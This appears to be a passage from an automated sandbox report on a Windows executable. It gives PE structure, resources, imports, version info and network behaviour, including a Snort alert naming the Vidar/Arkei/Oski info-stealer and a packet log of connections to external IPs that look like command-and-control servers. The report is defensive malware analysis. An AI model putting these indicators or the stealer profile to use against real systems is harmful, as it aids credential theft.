IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x121f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x30a80	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x108f9	0x10a00	False	0.611783364662	data	6.69578826316	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x1fc78	0x1fe00	False	0.303040747549	data	3.52249440191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x32000	0x273bbb8	0x8600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x276e000	0xfe00	0xfe00	False	0.648821973425	data	6.49635421339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x277ccb0	0xe	data	French	Switzerland
KUNADOREHUMENANAMOVIZO	0x277a728	0x24dd	ASCII text, with very long lines, with no line terminators	French	Switzerland
SENUZEMIX	0x277a0f0	0x636	ASCII text, with very long lines, with no line terminators	French	Switzerland
RT_ICON	0x276e660	0xea8	data	Spanish	Argentina
RT_ICON	0x276f508	0x8a8	data	Spanish	Argentina
RT_ICON	0x276fdb0	0x6c8	data	Spanish	Argentina
RT_ICON	0x2770478	0x568	GLS_BINARY_LSB_FIRST	Spanish	Argentina
RT_ICON	0x27709e0	0x25a8	data	Spanish	Argentina
RT_ICON	0x2772f88	0x10a8	data	Spanish	Argentina
RT_ICON	0x2774030	0x988	data	Spanish	Argentina
RT_ICON	0x27749b8	0x468	GLS_BINARY_LSB_FIRST	Spanish	Argentina
RT_ICON	0x2774e98	0xea8	data	Spanish	Argentina
RT_ICON	0x2775d40	0x8a8	data	Spanish	Argentina
RT_ICON	0x27765e8	0x25a8	dBase III DBT, version number 0, next free block index 40	Spanish	Argentina
RT_ICON	0x2778b90	0x10a8	data	Spanish	Argentina
RT_ICON	0x2779c38	0x468	GLS_BINARY_LSB_FIRST	Spanish	Argentina
RT_STRING	0x277ce78	0x3ca	data	French	Switzerland
RT_STRING	0x277d248	0x1fa	data	French	Switzerland
RT_STRING	0x277d448	0x3e2	data	French	Switzerland
RT_STRING	0x277d830	0x344	data	French	Switzerland
RT_STRING	0x277db78	0x284	data	French	Switzerland
RT_ACCELERATOR	0x277cc08	0x68	data	French	Switzerland
RT_ACCELERATOR	0x277cc70	0x30	data	French	Switzerland
RT_GROUP_ICON	0x2774e20	0x76	data	Spanish	Argentina
RT_GROUP_ICON	0x277a0a0	0x4c	data	Spanish	Argentina
RT_VERSION	0x277ccc0	0x1b8	COM executable for DOS	French	Switzerland
None	0x277cca0	0xa	data	French	Switzerland

Imports

DLL

Import

KERNEL32.dll

DosDateTimeToFileTime, FindResourceExW, InterlockedIncrement, GetConsoleAliasA, GetCurrentActCtx, WriteConsoleInputA, GetConsoleAliasesLengthA, GetConsoleTitleA, ReadConsoleW, SetFileTime, InitializeCriticalSection, GlobalAlloc, TerminateThread, GetLocaleInfoW, SwitchToFiber, ReadConsoleInputA, ReadFileScatter, DnsHostnameToComputerNameW, GetWriteWatch, GetFileAttributesW, WriteConsoleW, SetComputerNameExW, CreateActCtxA, GetLongPathNameW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, HeapLock, OpenJobObjectW, GetModuleFileNameA, SetConsoleTitleW, GetModuleHandleA, GetStringTypeW, ReleaseMutex, GetVersionExA, EnumCalendarInfoExA, SwitchToThread, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, RtlUnwind, GetLastError, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, SetHandleCount, GetFileType, GetStartupInfoA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, LoadLibraryA, CloseHandle, CreateFileA, RaiseException, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetLocaleInfoA, HeapSize, FlushFileBuffers, SetEndOfFile, GetProcessHeap, ReadFile

USER32.dll

ShowCaret

Version Infos

Description	Data
ProjectVersion	3.14.70.27
InternationalName	bomgvioci.iwa
Copyright	Copyrighz (C) 2021, fudkort
Translation	0x0129 0x0794

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	Switzerland
Spanish	Argentina

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/09/22-18:48:32.814184	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
01/09/22-18:48:47.969897	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
01/09/22-18:48:52.924765	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49870	80	192.168.2.3	65.108.180.72
01/09/22-18:48:56.812857	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49870	80	192.168.2.3	65.108.180.72

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2022 18:47:37.490298033 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:37.663129091 CET	80	49746	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:37.664650917 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:37.664779902 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:37.664803982 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:37.837661028 CET	80	49746	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.211246967 CET	80	49746	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.211365938 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.212610960 CET	49746	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.245563984 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.385413885 CET	80	49746	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.416316032 CET	80	49747	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.416400909 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.416515112 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.416536093 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.586771011 CET	80	49747	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.959603071 CET	80	49747	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.959630966 CET	80	49747	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:38.959714890 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:38.960690022 CET	49747	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:39.130753994 CET	80	49747	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:39.315246105 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:39.486186981 CET	80	49748	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:39.488753080 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:39.488821030 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:39.488836050 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:39.659657955 CET	80	49748	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.043361902 CET	80	49748	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.043544054 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.047164917 CET	49748	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.078283072 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.218118906 CET	80	49748	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.248389959 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.248482943 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.248591900 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.248615980 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.418561935 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.418606997 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.792582989 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.792629957 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:40.792701960 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.793127060 CET	49749	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.827336073 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:40.963088989 CET	80	49749	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.007337093 CET	80	49750	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.007519960 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.007575035 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.007608891 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.187515974 CET	80	49750	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.570221901 CET	80	49750	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.570394039 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.570449114 CET	49750	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.599050999 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.750411987 CET	80	49750	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.770766973 CET	80	49751	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:41.770976067 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.771090031 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.771151066 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:41.942771912 CET	80	49751	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:42.320991993 CET	80	49751	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:42.321063995 CET	80	49751	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:42.321160078 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:42.321438074 CET	49751	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:42.354928970 CET	49752	80	192.168.2.3	185.186.142.166
Jan 9, 2022 18:47:42.410634041 CET	80	49752	185.186.142.166	192.168.2.3
Jan 9, 2022 18:47:42.493175030 CET	80	49751	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:42.918580055 CET	49752	80	192.168.2.3	185.186.142.166
Jan 9, 2022 18:47:42.974088907 CET	80	49752	185.186.142.166	192.168.2.3
Jan 9, 2022 18:47:43.481231928 CET	49752	80	192.168.2.3	185.186.142.166
Jan 9, 2022 18:47:43.537069082 CET	80	49752	185.186.142.166	192.168.2.3
Jan 9, 2022 18:47:43.566369057 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:43.740994930 CET	80	49753	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:43.741256952 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:43.741322994 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:43.741333008 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:43.918694973 CET	80	49753	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:44.302823067 CET	80	49753	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:44.302881002 CET	80	49753	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:44.303026915 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.308624029 CET	49753	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.333693027 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.483041048 CET	80	49753	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:44.505728960 CET	80	49754	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:44.505837917 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.505935907 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.505949020 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:44.677834034 CET	80	49754	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:45.064043999 CET	80	49754	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:45.064094067 CET	80	49754	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:45.064229965 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:45.075459003 CET	49754	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:45.247509003 CET	80	49754	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:45.415164948 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:45.588037014 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:45.588166952 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:45.588249922 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:45.801788092 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129401922 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129466057 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129506111 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129523993 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.129545927 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129586935 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129605055 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.129627943 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129667044 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129677057 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.129707098 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129745007 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129753113 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.129784107 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.129839897 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.302321911 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.310914993 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.310971022 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311005116 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311014891 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311055899 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311079979 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311095953 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311136961 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311150074 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311176062 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311216116 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311229944 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311256886 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311297894 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311314106 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311337948 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311377048 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311393023 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311414003 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311453104 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311460018 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311491013 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311531067 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311546087 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311573982 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311611891 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311625004 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.311651945 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.311705112 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.484091997 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.484157085 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.484194040 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.484232903 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492475033 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492532015 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492572069 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492590904 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492613077 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492614985 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492655039 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492696047 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492702961 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492738008 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492777109 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492789030 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492819071 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492892027 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492902040 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.492933035 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492970943 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.492981911 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493010044 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493047953 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493066072 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493088007 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493128061 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493141890 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493165016 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493204117 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493211985 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493243933 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493280888 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493288040 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493321896 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493360043 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493372917 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493400097 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493441105 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493455887 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493479013 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493518114 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493527889 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493558884 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493594885 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493603945 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493634939 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493674040 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493685961 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493711948 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493752003 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493761063 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493789911 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493829012 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493841887 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493868113 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493906021 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493918896 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.493946075 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.493990898 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.656785011 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.656874895 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.656919003 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.656954050 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.656960011 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.657011032 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.666383028 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.666446924 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.666477919 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.666507959 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674391031 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674453020 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674490929 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674508095 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674530983 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674552917 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674572945 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674612999 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674623966 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674654007 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674694061 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674715996 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674735069 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674774885 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674802065 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674813032 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674853086 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674854994 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674895048 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674932957 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.674946070 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.674973011 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675012112 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675029993 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675054073 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675095081 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675110102 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675133944 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675173998 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675183058 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675213099 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675249100 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675266027 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675287962 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675328970 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675331116 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675368071 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675409079 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675419092 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675447941 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675487995 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675493956 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675528049 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675565004 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675575018 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675606012 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675645113 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675657034 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675684929 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675725937 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675741911 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675765038 CET	80	49755	47.251.44.201	192.168.2.3
